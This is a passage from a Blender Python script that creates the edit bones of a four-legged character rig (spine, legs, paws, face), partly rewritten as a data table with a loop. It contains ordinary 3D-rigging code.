bones['pelvis.R'] = bone.name
bone = arm.edit_bones.new('thigh.L')
bone.head[:] = 0.1249, 0.3419, 0.7379
bone.tail[:] = 0.1249, 0.2712, 0.4731
bone.roll = -0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['thigh.L'] = bone.name
bone = arm.edit_bones.new('thigh.R')
bone.head[:] = -0.1249, 0.3419, 0.7379
bone.tail[:] = -0.1249, 0.2712, 0.4731
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['thigh.R'] = bone.name
bone = arm.edit_bones.new('spine.007')
bone.head[:] = 0.0000, 0.0319, 0.7731
bone.tail[:] = 0.0000, -0.0980, 0.7945
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.006']]
bones['spine.007'] = bone.name
bone = arm.edit_bones.new('shin.L')
bone.head[:] = 0.1249, 0.2712, 0.4731
bone.tail[:] = 0.1114, 0.4766, 0.2473
bone.roll = 0.0195
bone.use_connect = True
bone.parent = arm.edit_bones[bones['thigh.L']]
bones['shin.L'] = bone.name
bone = arm.edit_bones.new('shin.R')
bone.head[:] = -0.1249, 0.2712, 0.4731
bone.tail[:] = -0.1114, 0.4766, 0.2473
bone.roll = -0.0195
bone.use_connect = True
bone.parent = arm.edit_bones[bones['thigh.R']]
bones['shin.R'] = bone.name
bone = arm.edit_bones.new('spine.008')
bone.head[:] = 0.0000, -0.0980, 0.7945
bone.tail[:] = 0.0000, -0.3618, 0.8375
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.007']]
bones['spine.008'] = bone.name
bone = arm.edit_bones.new('foot.L')
bone.head[:] = 0.1114, 0.4766, 0.2473
bone.tail[:] = 0.1088, 0.4138, 0.0411
bone.roll = 0.0165
bone.use_connect = True
bone.parent = arm.edit_bones[bones['shin.L']]
bones['foot.L'] = bone.name
bone = arm.edit_bones.new('foot.R')
bone.head[:] = -0.1114, 0.4766, 0.2473
bone.tail[:] = -0.1088, 0.4138, 0.0411
bone.roll = -0.0165
bone.use_connect = True
bone.parent = arm.edit_bones[bones['shin.R']]
bones['foot.R'] = bone.name
bone = arm.edit_bones.new('spine.009')
bone.head[:] = 0.0000, -0.3618, 0.8375
bone.tail[:] = 0.0000, -0.4253, 0.8585
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.008']]
bones['spine.009'] = bone.name
bone = arm.edit_bones.new('shoulder.L')
bone.head[:] = 0.0596, -0.2578, 0.8876
bone.tail[:] = 0.1249, -0.3418, 0.7153
bone.roll = -0.3526
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.008']]
bones['shoulder.L'] = bone.name
# Metarig edit-bone construction, refactored from 147 repeated 7-line
# stanzas into a data table plus one loop.  Each row is:
#   (name, head (x, y, z), tail (x, y, z), roll, use_connect, parent key)
# Row order matters: every parent bone is created (and registered in the
# `bones` name map) before any child row references it.  `arm` (armature
# data in edit mode) and `bones` (created-name registry) are defined
# earlier in this script, as are the parent keys used by the first rows
# ('spine.008', 'spine.009', 'foot.L', 'foot.R', 'shoulder.L').
_BONE_TABLE = [
    ('shoulder.R', (-0.0596, -0.2578, 0.8876), (-0.1249, -0.3418, 0.7153), 0.3526, False, 'spine.008'),
    ('breast.L', (0.0340, -0.1694, 0.6676), (0.0340, -0.3139, 0.5296), 0.0000, False, 'spine.008'),
    ('breast.R', (-0.0340, -0.1694, 0.6676), (-0.0340, -0.3139, 0.5296), -0.0000, False, 'spine.008'),
    ('toe.L', (0.1088, 0.4138, 0.0411), (0.1088, 0.3213, 0.0000), 3.1416, True, 'foot.L'),
    ('toe.R', (-0.1088, 0.4138, 0.0411), (-0.1088, 0.3213, 0.0000), -3.1416, True, 'foot.R'),
    ('spine.010', (0.0000, -0.4253, 0.8585), (0.0000, -0.4888, 0.8796), 0.0000, True, 'spine.009'),
    ('front_thigh.L', (0.1249, -0.3161, 0.6902), (0.1249, -0.2245, 0.4418), -0.0000, False, 'shoulder.L'),
    ('front_thigh.R', (-0.1249, -0.3161, 0.6902), (-0.1249, -0.2245, 0.4418), 0.0000, False, 'shoulder.R'),
    ('r_palm.04.L', (0.1140, 0.4168, 0.0282), (0.1337, 0.3749, 0.0253), -2.8623, False, 'toe.L'),
    ('r_palm.03.L', (0.1053, 0.4151, 0.0282), (0.1150, 0.3664, 0.0377), 1.5833, False, 'toe.L'),
    ('r_palm.02.L', (0.0964, 0.4152, 0.0282), (0.0894, 0.3664, 0.0377), -1.2317, False, 'toe.L'),
    ('r_palm.01.L', (0.0845, 0.4178, 0.0282), (0.0702, 0.3781, 0.0253), 2.8333, False, 'toe.L'),
    ('r_palm.04.R', (-0.1140, 0.4168, 0.0282), (-0.1337, 0.3749, 0.0253), 2.8623, False, 'toe.R'),
    ('r_palm.03.R', (-0.1053, 0.4151, 0.0282), (-0.1150, 0.3664, 0.0377), -1.5833, False, 'toe.R'),
    ('r_palm.02.R', (-0.0964, 0.4152, 0.0282), (-0.0894, 0.3664, 0.0377), 1.2317, False, 'toe.R'),
    ('r_palm.01.R', (-0.0845, 0.4178, 0.0282), (-0.0702, 0.3781, 0.0253), -2.8333, False, 'toe.R'),
    ('spine.011', (0.0000, -0.4888, 0.8796), (0.0000, -0.6590, 0.9809), 0.0000, True, 'spine.010'),
    ('front_shin.L', (0.1249, -0.2245, 0.4418), (0.1114, -0.2147, 0.1698), 0.0098, True, 'front_thigh.L'),
    ('front_shin.R', (-0.1249, -0.2245, 0.4418), (-0.1114, -0.2147, 0.1698), -0.0098, True, 'front_thigh.R'),
    ('r_pinky.01.L', (0.1337, 0.3749, 0.0253), (0.1388, 0.3551, 0.0222), -2.0928, False, 'r_palm.04.L'),
    ('r_ring.01.L', (0.1150, 0.3664, 0.0377), (0.1166, 0.3467, 0.0317), -0.5451, False, 'r_palm.03.L'),
    ('r_middle.01.L', (0.0894, 0.3664, 0.0377), (0.0866, 0.3467, 0.0317), 0.9401, False, 'r_palm.02.L'),
    ('r_index.01.L', (0.0702, 0.3781, 0.0253), (0.0660, 0.3581, 0.0222), 1.9945, False, 'r_palm.01.L'),
    ('r_pinky.01.R', (-0.1337, 0.3749, 0.0253), (-0.1388, 0.3551, 0.0222), 2.0928, False, 'r_palm.04.R'),
    ('r_ring.01.R', (-0.1150, 0.3664, 0.0377), (-0.1166, 0.3467, 0.0317), 0.5451, False, 'r_palm.03.R'),
    ('r_middle.01.R', (-0.0894, 0.3664, 0.0377), (-0.0866, 0.3467, 0.0317), -0.9401, False, 'r_palm.02.R'),
    ('r_index.01.R', (-0.0702, 0.3781, 0.0253), (-0.0660, 0.3581, 0.0222), -1.9945, False, 'r_palm.01.R'),
    ('face', (-0.0000, -0.6484, 0.8273), (-0.0000, -0.6484, 0.8890), 0.0000, False, 'spine.011'),
    ('front_foot.L', (0.1114, -0.2147, 0.1698), (0.1088, -0.2462, 0.0411), 0.0272, True, 'front_shin.L'),
    ('front_foot.R', (-0.1114, -0.2147, 0.1698), (-0.1088, -0.2462, 0.0411), -0.0272, True, 'front_shin.R'),
    ('r_pinky.02.L', (0.1388, 0.3551, 0.0222), (0.1431, 0.3382, 0.0170), -1.4292, True, 'r_pinky.01.L'),
    ('r_ring.02.L', (0.1166, 0.3467, 0.0317), (0.1188, 0.3297, 0.0224), -0.5100, True, 'r_ring.01.L'),
    ('r_middle.02.L', (0.0866, 0.3467, 0.0317), (0.0851, 0.3297, 0.0224), 0.4076, True, 'r_middle.01.L'),
    ('r_index.02.L', (0.0660, 0.3581, 0.0222), (0.0623, 0.3410, 0.0170), 1.3847, True, 'r_index.01.L'),
    ('r_pinky.02.R', (-0.1388, 0.3551, 0.0222), (-0.1431, 0.3382, 0.0170), 1.4292, True, 'r_pinky.01.R'),
    ('r_ring.02.R', (-0.1166, 0.3467, 0.0317), (-0.1188, 0.3297, 0.0224), 0.5100, True, 'r_ring.01.R'),
    ('r_middle.02.R', (-0.0866, 0.3467, 0.0317), (-0.0851, 0.3297, 0.0224), -0.4076, True, 'r_middle.01.R'),
    ('r_index.02.R', (-0.0660, 0.3581, 0.0222), (-0.0623, 0.3410, 0.0170), -1.3847, True, 'r_index.01.R'),
    ('nose', (0.0000, -0.7082, 0.9031), (0.0000, -0.7989, 0.8595), 0.0000, False, 'face'),
    ('lip.T.L', (0.0000, -0.8212, 0.7930), (0.0353, -0.7614, 0.7866), 0.0551, False, 'face'),
    ('lip.B.L', (0.0000, -0.7962, 0.7788), (0.0258, -0.7624, 0.7742), 0.0255, False, 'face'),
    ('jaw', (0.0000, -0.6191, 0.7820), (0.0000, -0.6960, 0.7733), 0.0000, False, 'face'),
    ('ear.L', (0.0949, -0.5457, 0.9545), (0.0524, -0.5459, 0.9899), -1.1774, False, 'face'),
    ('ear.R', (-0.0949, -0.5457, 0.9545), (-0.0524, -0.5459, 0.9899), 1.1774, False, 'face'),
    ('lip.T.R', (0.0000, -0.8212, 0.7930), (-0.0353, -0.7614, 0.7866), -0.0551, False, 'face'),
    ('lip.B.R', (0.0000, -0.7962, 0.7788), (-0.0258, -0.7624, 0.7742), -0.0255, False, 'face'),
    ('brow.B.L', (0.0745, -0.6532, 0.9192), (0.0659, -0.6703, 0.9324), 0.7673, False, 'face'),
    ('lid.T.L', (0.0621, -0.6644, 0.9197), (0.0588, -0.6755, 0.9223), 0.0733, False, 'face'),
    ('brow.B.R', (-0.0745, -0.6532, 0.9192), (-0.0659, -0.6703, 0.9324), -0.7673, False, 'face'),
    ('lid.T.R', (-0.0621, -0.6644, 0.9197), (-0.0588, -0.6755, 0.9223), -0.0733, False, 'face'),
    ('forehead.L', (0.0208, -0.6604, 0.9808), (0.0160, -0.7017, 0.9527), 1.9432, False, 'face'),
    ('forehead.R', (-0.0208, -0.6604, 0.9808), (-0.0160, -0.7017, 0.9527), -1.9432, False, 'face'),
    ('eye.L', (0.0388, -0.6496, 0.9149), (0.0388, -0.7010, 0.9149), 0.0000, False, 'face'),
    ('eye.R', (-0.0388, -0.6496, 0.9149), (-0.0388, -0.7010, 0.9149), 0.0000, False, 'face'),
    ('cheek.T.L', (0.0906, -0.6428, 0.9032), (0.0660, -0.6881, 0.8704), -0.0634, False, 'face'),
    ('cheek.T.R', (-0.0906, -0.6428, 0.9032), (-0.0660, -0.6881, 0.8704), 0.0634, False, 'face'),
    ('teeth.T', (0.0004, -0.7594, 0.8194), (0.0004, -0.7302, 0.8292), 0.0000, False, 'face'),
    ('teeth.B', (0.0004, -0.7504, 0.7968), (0.0004, -0.7204, 0.8041), 0.0000, False, 'face'),
    ('tongue', (0.0004, -0.7646, 0.7930), (0.0004, -0.7476, 0.7967), 0.0000, False, 'face'),
    ('front_toe.L', (0.1088, -0.2462, 0.0411), (0.1088, -0.3259, 0.0000), 3.1416, True, 'front_foot.L'),
    ('front_toe.R', (-0.1088, -0.2462, 0.0411), (-0.1088, -0.3259, 0.0000), -3.1416, True, 'front_foot.R'),
    ('r_pinky.03.L', (0.1431, 0.3382, 0.0170), (0.1455, 0.3175, 0.0129), -1.0952, True, 'r_pinky.02.L'),
    ('r_ring.03.L', (0.1188, 0.3297, 0.0224), (0.1239, 0.2905, 0.0129), -0.9905, True, 'r_ring.02.L'),
    ('r_middle.03.L', (0.0851, 0.3297, 0.0224), (0.0813, 0.2904, 0.0129), 0.8084, True, 'r_middle.02.L'),
    ('r_index.03.L', (0.0623, 0.3410, 0.0170), (0.0552, 0.3214, 0.0129), 2.2048, True, 'r_index.02.L'),
    ('r_pinky.03.R', (-0.1431, 0.3382, 0.0170), (-0.1455, 0.3175, 0.0129), 1.0952, True, 'r_pinky.02.R'),
    ('r_ring.03.R', (-0.1188, 0.3297, 0.0224), (-0.1239, 0.2905, 0.0129), 0.9905, True, 'r_ring.02.R'),
    ('r_middle.03.R', (-0.0851, 0.3297, 0.0224), (-0.0813, 0.2904, 0.0129), -0.8084, True, 'r_middle.02.R'),
    ('r_index.03.R', (-0.0623, 0.3410, 0.0170), (-0.0552, 0.3214, 0.0129), -2.2048, True, 'r_index.02.R'),
    ('nose.001', (0.0000, -0.7989, 0.8595), (0.0000, -0.8391, 0.8371), 0.0000, True, 'nose'),
    ('lip.T.L.001', (0.0353, -0.7614, 0.7866), (0.0482, -0.6927, 0.7995), 0.1558, True, 'lip.T.L'),
    ('lip.B.L.001', (0.0258, -0.7624, 0.7742), (0.0482, -0.6927, 0.7995), 0.4650, True, 'lip.B.L'),
    ('chin', (0.0000, -0.6960, 0.7733), (0.0000, -0.7687, 0.7625), 0.0000, True, 'jaw'),
    ('ear.L.001', (0.0524, -0.5459, 0.9899), (0.0727, -0.5682, 1.0212), 0.2280, True, 'ear.L'),
    ('ear.R.001', (-0.0524, -0.5459, 0.9899), (-0.0727, -0.5682, 1.0212), -0.2280, True, 'ear.R'),
    ('lip.T.R.001', (-0.0353, -0.7614, 0.7866), (-0.0482, -0.6927, 0.7995), -0.1558, True, 'lip.T.R'),
    ('lip.B.R.001', (-0.0258, -0.7624, 0.7742), (-0.0482, -0.6927, 0.7995), -0.4650, True, 'lip.B.R'),
    ('brow.B.L.001', (0.0659, -0.6703, 0.9324), (0.0507, -0.6764, 0.9344), 0.0953, True, 'brow.B.L'),
    ('lid.T.L.001', (0.0588, -0.6755, 0.9223), (0.0503, -0.6779, 0.9257), 0.4801, True, 'lid.T.L'),
    ('brow.B.R.001', (-0.0659, -0.6703, 0.9324), (-0.0507, -0.6764, 0.9344), -0.0953, True, 'brow.B.R'),
    ('lid.T.R.001', (-0.0588, -0.6755, 0.9223), (-0.0503, -0.6779, 0.9257), -0.4801, True, 'lid.T.R'),
    ('forehead.L.001', (0.0418, -0.6520, 0.9749), (0.0510, -0.6773, 0.9561), 0.5278, False, 'forehead.L'),
    ('forehead.R.001', (-0.0418, -0.6520, 0.9749), (-0.0510, -0.6773, 0.9561), -0.5278, False, 'forehead.R'),
    ('cheek.T.L.001', (0.0660, -0.6881, 0.8704), (0.0389, -0.7093, 0.8768), -0.5772, True, 'cheek.T.L'),
    ('cheek.T.R.001', (-0.0660, -0.6881, 0.8704), (-0.0389, -0.7093, 0.8768), 0.5772, True, 'cheek.T.R'),
    ('tongue.001', (0.0004, -0.7476, 0.7967), (0.0004, -0.7246, 0.8052), 0.0000, True, 'tongue'),
    ('f_palm.04.L', (0.1229, -0.2329, 0.0282), (0.1426, -0.2749, 0.0253), -2.8623, False, 'front_toe.L'),
    ('f_palm.03.L', (0.1142, -0.2346, 0.0282), (0.1239, -0.2833, 0.0377), 1.5833, False, 'front_toe.L'),
    ('f_palm.02.L', (0.1053, -0.2345, 0.0282), (0.0983, -0.2834, 0.0377), -1.2317, False, 'front_toe.L'),
    ('f_palm.01.L', (0.0934, -0.2319, 0.0282), (0.0791, -0.2716, 0.0253), 2.8333, False, 'front_toe.L'),
    ('f_palm.04.R', (-0.1229, -0.2329, 0.0282), (-0.1426, -0.2749, 0.0253), 2.8623, False, 'front_toe.R'),
    ('f_palm.03.R', (-0.1142, -0.2346, 0.0282), (-0.1239, -0.2833, 0.0377), -1.5833, False, 'front_toe.R'),
    ('f_palm.02.R', (-0.1053, -0.2345, 0.0282), (-0.0983, -0.2834, 0.0377), 1.2317, False, 'front_toe.R'),
    ('f_palm.01.R', (-0.0934, -0.2319, 0.0282), (-0.0791, -0.2716, 0.0253), -2.8333, False, 'front_toe.R'),
    ('nose.002', (0.0000, -0.8391, 0.8371), (0.0000, -0.8452, 0.8281), -0.0162, True, 'nose.001'),
    ('chin.001', (0.0000, -0.7687, 0.7625), (0.0000, -0.7926, 0.7756), 0.0000, True, 'chin'),
    ('ear.L.002', (0.0727, -0.5682, 1.0212), (0.1158, -0.5606, 1.0358), -1.9007, True, 'ear.L.001'),
    ('ear.R.002', (-0.0727, -0.5682, 1.0212), (-0.1158, -0.5606, 1.0358), 1.9007, True, 'ear.R.001'),
    ('brow.B.L.002', (0.0507, -0.6764, 0.9344), (0.0362, -0.6871, 0.9343), 0.2604, True, 'brow.B.L.001'),
    ('lid.T.L.002', (0.0503, -0.6779, 0.9257), (0.0361, -0.6798, 0.9241), 0.0945, True, 'lid.T.L.001'),
    ('brow.B.R.002', (-0.0507, -0.6764, 0.9344), (-0.0362, -0.6871, 0.9343), -0.2604, True, 'brow.B.R.001'),
    ('lid.T.R.002', (-0.0503, -0.6779, 0.9257), (-0.0361, -0.6798, 0.9241), -0.0945, True, 'lid.T.R.001'),
    ('forehead.L.002', (0.0581, -0.6362, 0.9723), (0.0774, -0.6567, 0.9438), -0.3374, False, 'forehead.L.001'),
    ('forehead.R.002', (-0.0581, -0.6362, 0.9723), (-0.0774, -0.6567, 0.9438), 0.3374, False, 'forehead.R.001'),
    ('nose.L', (0.0389, -0.7093, 0.8768), (0.0360, -0.7993, 0.8371), -2.8274, True, 'cheek.T.L.001'),
    ('nose.R', (-0.0389, -0.7093, 0.8768), (-0.0360, -0.7993, 0.8371), 2.8274, True, 'cheek.T.R.001'),
    ('tongue.002', (0.0004, -0.7246, 0.8052), (0.0004, -0.6900, 0.8003), 0.0000, True, 'tongue.001'),
    ('f_pinky.01.L', (0.1426, -0.2749, 0.0253), (0.1477, -0.2946, 0.0222), -2.0928, False, 'f_palm.04.L'),
    ('f_ring.01.L', (0.1239, -0.2833, 0.0377), (0.1255, -0.3031, 0.0317), -0.5451, False, 'f_palm.03.L'),
    ('f_middle.01.L', (0.0983, -0.2834, 0.0377), (0.0955, -0.3030, 0.0317), 0.9401, False, 'f_palm.02.L'),
    ('f_index.01.L', (0.0791, -0.2716, 0.0253), (0.0749, -0.2916, 0.0222), 1.9945, False, 'f_palm.01.L'),
    ('f_pinky.01.R', (-0.1426, -0.2749, 0.0253), (-0.1477, -0.2946, 0.0222), 2.0928, False, 'f_palm.04.R'),
    ('f_ring.01.R', (-0.1239, -0.2833, 0.0377), (-0.1255, -0.3031, 0.0317), 0.5451, False, 'f_palm.03.R'),
    ('f_middle.01.R', (-0.0983, -0.2834, 0.0377), (-0.0955, -0.3030, 0.0317), -0.9401, False, 'f_palm.02.R'),
    ('f_index.01.R', (-0.0791, -0.2716, 0.0253), (-0.0749, -0.2916, 0.0222), -1.9945, False, 'f_palm.01.R'),
    ('nose.003', (0.0000, -0.8452, 0.8281), (0.0000, -0.8349, 0.8089), -0.0248, True, 'nose.002'),
    ('ear.L.003', (0.1158, -0.5606, 1.0358), (0.1130, -0.5379, 0.9935), 2.4141, True, 'ear.L.002'),
    ('ear.R.003', (-0.1158, -0.5606, 1.0358), (-0.1130, -0.5379, 0.9935), -2.4141, True, 'ear.R.002'),
    ('brow.B.L.003', (0.0362, -0.6871, 0.9343), (0.0269, -0.6936, 0.9293), 0.2912, True, 'brow.B.L.002'),
    ('lid.T.L.003', (0.0361, -0.6798, 0.9241), (0.0281, -0.6756, 0.9088), -0.3539, True, 'lid.T.L.002'),
    ('brow.B.R.003', (-0.0362, -0.6871, 0.9343), (-0.0269, -0.6936, 0.9293), -0.2912, True, 'brow.B.R.002'),
    ('lid.T.R.003', (-0.0361, -0.6798, 0.9241), (-0.0281, -0.6756, 0.9088), 0.3539, True, 'lid.T.R.002'),
    ('temple.L', (0.0590, -0.5870, 0.9758), (0.0931, -0.5866, 0.8642), -0.4594, False, 'forehead.L.002'),
    ('temple.R', (-0.0590, -0.5870, 0.9758), (-0.0931, -0.5866, 0.8642), 0.4594, False, 'forehead.R.002'),
    ('nose.L.001', (0.0360, -0.7993, 0.8371), (0.0000, -0.8391, 0.8371), 2.9287, True, 'nose.L'),
    ('nose.R.001', (-0.0360, -0.7993, 0.8371), (0.0000, -0.8391, 0.8371), -2.9287, True, 'nose.R'),
    ('f_pinky.02.L', (0.1477, -0.2946, 0.0222), (0.1520, -0.3116, 0.0170), -1.4292, True, 'f_pinky.01.L'),
    ('f_ring.02.L', (0.1255, -0.3031, 0.0317), (0.1278, -0.3200, 0.0224), -0.5100, True, 'f_ring.01.L'),
    ('f_middle.02.L', (0.0955, -0.3030, 0.0317), (0.0940, -0.3200, 0.0224), 0.4076, True, 'f_middle.01.L'),
    ('f_index.02.L', (0.0749, -0.2916, 0.0222), (0.0712, -0.3087, 0.0170), 1.3847, True, 'f_index.01.L'),
    ('f_pinky.02.R', (-0.1477, -0.2946, 0.0222), (-0.1520, -0.3116, 0.0170), 1.4292, True, 'f_pinky.01.R'),
    ('f_ring.02.R', (-0.1255, -0.3031, 0.0317), (-0.1278, -0.3200, 0.0224), 0.5100, True, 'f_ring.01.R'),
    ('f_middle.02.R', (-0.0955, -0.3030, 0.0317), (-0.0940, -0.3200, 0.0224), -0.4076, True, 'f_middle.01.R'),
    ('f_index.02.R', (-0.0749, -0.2916, 0.0222), (-0.0712, -0.3087, 0.0170), -1.3847, True, 'f_index.01.R'),
    ('nose.004', (0.0000, -0.8349, 0.8089), (0.0000, -0.8159, 0.7913), 0.0082, True, 'nose.003'),
    ('ear.L.004', (0.1130, -0.5379, 0.9935), (0.0949, -0.5457, 0.9545), -2.3814, True, 'ear.L.003'),
    ('ear.R.004', (-0.1130, -0.5379, 0.9935), (-0.0949, -0.5457, 0.9545), 2.3814, True, 'ear.R.003'),
    ('lid.B.L', (0.0281, -0.6756, 0.9088), (0.0382, -0.6786, 0.9040), 0.2941, True, 'lid.T.L.003'),
    ('lid.B.R', (-0.0281, -0.6756, 0.9088), (-0.0382, -0.6786, 0.9040), -0.2941, True, 'lid.T.R.003'),
    ('jaw.L', (0.0931, -0.5866, 0.8642), (0.0694, -0.6211, 0.8005), 0.0983, True, 'temple.L'),
    ('jaw.R', (-0.0931, -0.5866, 0.8642), (-0.0694, -0.6211, 0.8005), -0.0983, True, 'temple.R'),
    ('f_pinky.03.L', (0.1520, -0.3116, 0.0170), (0.1544, -0.3323, 0.0129), -1.0952, True, 'f_pinky.02.L'),
    ('f_ring.03.L', (0.1278, -0.3200, 0.0224), (0.1328, -0.3592, 0.0129), -0.9905, True, 'f_ring.02.L'),
    ('f_middle.03.L', (0.0940, -0.3200, 0.0224), (0.0902, -0.3593, 0.0129), 0.8084, True, 'f_middle.02.L'),
    ('f_index.03.L', (0.0712, -0.3087, 0.0170), (0.0641, -0.3283, 0.0129), 2.2048, True, 'f_index.02.L'),
    ('f_pinky.03.R', (-0.1520, -0.3116, 0.0170), (-0.1544, -0.3323, 0.0129), 1.0952, True, 'f_pinky.02.R'),
    ('f_ring.03.R', (-0.1278, -0.3200, 0.0224), (-0.1328, -0.3592, 0.0129), 0.9905, True, 'f_ring.02.R'),
]
for _bname, _head, _tail, _roll, _connect, _parent in _BONE_TABLE:
    # Identical statement sequence (and order) as the original generated
    # stanzas, so side effects on `arm` and `bones` are unchanged.
    bone = arm.edit_bones.new(_bname)
    bone.head[:] = _head
    bone.tail[:] = _tail
    bone.roll = _roll
    bone.use_connect = _connect
    # Parent is looked up through the `bones` registry because Blender may
    # rename a new bone on collision; the registry holds the actual name.
    bone.parent = arm.edit_bones[bones[_parent]]
    bones[_bname] = bone.name
bone = arm.edit_bones.new('f_middle.03.R')
bone.head[:] = -0.0940, -0.3200, 0.0224
bone.tail[:] = -0.0902, -0.3593, 0.0129
bone.roll = -0.8084
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_middle.02.R']]
bones['f_middle.03.R'] = bone.name
bone = arm.edit_bones.new('f_index.03.R')
bone.head[:] = -0.0712, -0.3087, 0.0170
bone.tail[:] = -0.0641, -0.3283, 0.0129
bone.roll = -2.2048
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_index.02.R']]
bones['f_index.03.R'] = bone.name
bone = arm.edit_bones.new('lid.B.L.001')
bone.head[:] = 0.0382, -0.6786, 0.9040
bone.tail[:] = 0.0476, -0.6772, 0.9036
bone.roll = 0.0266
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.L']]
bones['lid.B.L.001'] = bone.name
bone = arm.edit_bones.new('lid.B.R.001')
bone.head[:] = -0.0382, -0.6786, 0.9040
bone.tail[:] = -0.0476, -0.6772, 0.9036
bone.roll = -0.0266
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.R']]
bones['lid.B.R.001'] = bone.name
bone = arm.edit_bones.new('jaw.L.001')
bone.head[:] = 0.0694, -0.6211, 0.8005
bone.tail[:] = 0.0481, -0.6715, 0.7849
bone.roll = 0.2993
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.L']]
bones['jaw.L.001'] = bone.name
bone = arm.edit_bones.new('jaw.R.001')
bone.head[:] = -0.0694, -0.6211, 0.8005
bone.tail[:] = -0.0481, -0.6715, 0.7849
bone.roll = -0.2993
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.R']]
bones['jaw.R.001'] = bone.name
bone = arm.edit_bones.new('lid.B.L.002')
bone.head[:] = 0.0476, -0.6772, 0.9036
bone.tail[:] = 0.0570, -0.6724, 0.9082
bone.roll = -0.1195
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.L.001']]
bones['lid.B.L.002'] = bone.name
bone = arm.edit_bones.new('lid.B.R.002')
bone.head[:] = -0.0476, -0.6772, 0.9036
bone.tail[:] = -0.0570, -0.6724, 0.9082
bone.roll = 0.1195
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.R.001']]
bones['lid.B.R.002'] = bone.name
bone = arm.edit_bones.new('chin.L')
bone.head[:] = 0.0481, -0.6715, 0.7849
bone.tail[:] = 0.0482, -0.6927, 0.7995
bone.roll = 3.1083
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.L.001']]
bones['chin.L'] = bone.name
bone = arm.edit_bones.new('chin.R')
bone.head[:] = -0.0481, -0.6715, 0.7849
bone.tail[:] = -0.0482, -0.6927, 0.7995
bone.roll = -3.1083
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.R.001']]
bones['chin.R'] = bone.name
bone = arm.edit_bones.new('lid.B.L.003')
bone.head[:] = 0.0570, -0.6724, 0.9082
bone.tail[:] = 0.0621, -0.6644, 0.9197
bone.roll = -0.1171
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.L.002']]
bones['lid.B.L.003'] = bone.name
bone = arm.edit_bones.new('lid.B.R.003')
bone.head[:] = -0.0570, -0.6724, 0.9082
bone.tail[:] = -0.0621, -0.6644, 0.9197
bone.roll = 0.1171
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.R.002']]
bones['lid.B.R.003'] = bone.name
bone = arm.edit_bones.new('cheek.B.L')
bone.head[:] = 0.0482, -0.6927, 0.7995
bone.tail[:] = 0.0707, -0.6771, 0.8294
bone.roll = -0.1207
bone.use_connect = True
bone.parent = arm.edit_bones[bones['chin.L']]
bones['cheek.B.L'] = bone.name
bone = arm.edit_bones.new('cheek.B.R')
bone.head[:] = -0.0482, -0.6927, 0.7995
bone.tail[:] = -0.0707, -0.6771, 0.8294
bone.roll = 0.1207
bone.use_connect = True
bone.parent = arm.edit_bones[bones['chin.R']]
bones['cheek.B.R'] = bone.name
bone = arm.edit_bones.new('cheek.B.L.001')
bone.head[:] = 0.0707, -0.6771, 0.8294
bone.tail[:] = 0.0906, -0.6428, 0.9032
bone.roll = 0.0640
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.B.L']]
bones['cheek.B.L.001'] = bone.name
bone = arm.edit_bones.new('cheek.B.R.001')
bone.head[:] = -0.0707, -0.6771, 0.8294
bone.tail[:] = -0.0906, -0.6428, 0.9032
bone.roll = -0.0640
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.B.R']]
bones['cheek.B.R.001'] = bone.name
bone = arm.edit_bones.new('brow.T.L')
bone.head[:] = 0.0906, -0.6428, 0.9032
bone.tail[:] = 0.0774, -0.6567, 0.9438
bone.roll = 0.1270
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.B.L.001']]
bones['brow.T.L'] = bone.name
bone = arm.edit_bones.new('brow.T.R')
bone.head[:] = -0.0906, -0.6428, 0.9032
bone.tail[:] = -0.0774, -0.6567, 0.9438
bone.roll = -0.1270
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.B.R.001']]
bones['brow.T.R'] = bone.name
bone = arm.edit_bones.new('brow.T.L.001')
bone.head[:] = 0.0774, -0.6567, 0.9438
bone.tail[:] = 0.0510, -0.6773, 0.9561
bone.roll = -2.7274
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.L']]
bones['brow.T.L.001'] = bone.name
bone = arm.edit_bones.new('brow.T.R.001')
bone.head[:] = -0.0774, -0.6567, 0.9438
bone.tail[:] = -0.0510, -0.6773, 0.9561
bone.roll = 2.7274
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.R']]
bones['brow.T.R.001'] = bone.name
bone = arm.edit_bones.new('brow.T.L.002')
bone.head[:] = 0.0510, -0.6773, 0.9561
bone.tail[:] = 0.0160, -0.7017, 0.9527
bone.roll = 0.4172
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.L.001']]
bones['brow.T.L.002'] = bone.name
bone = arm.edit_bones.new('brow.T.R.002')
bone.head[:] = -0.0510, -0.6773, 0.9561
bone.tail[:] = -0.0160, -0.7017, 0.9527
bone.roll = -0.4172
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.R.001']]
bones['brow.T.R.002'] = bone.name
bone = arm.edit_bones.new('brow.T.L.003')
bone.head[:] = 0.0160, -0.7017, 0.9527
bone.tail[:] = 0.0000, -0.7082, 0.9031
bone.roll = -0.6706
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.L.002']]
bones['brow.T.L.003'] = bone.name
bone = arm.edit_bones.new('brow.T.R.003')
bone.head[:] = -0.0160, -0.7017, 0.9527
bone.tail[:] = 0.0000, -0.7082, 0.9031
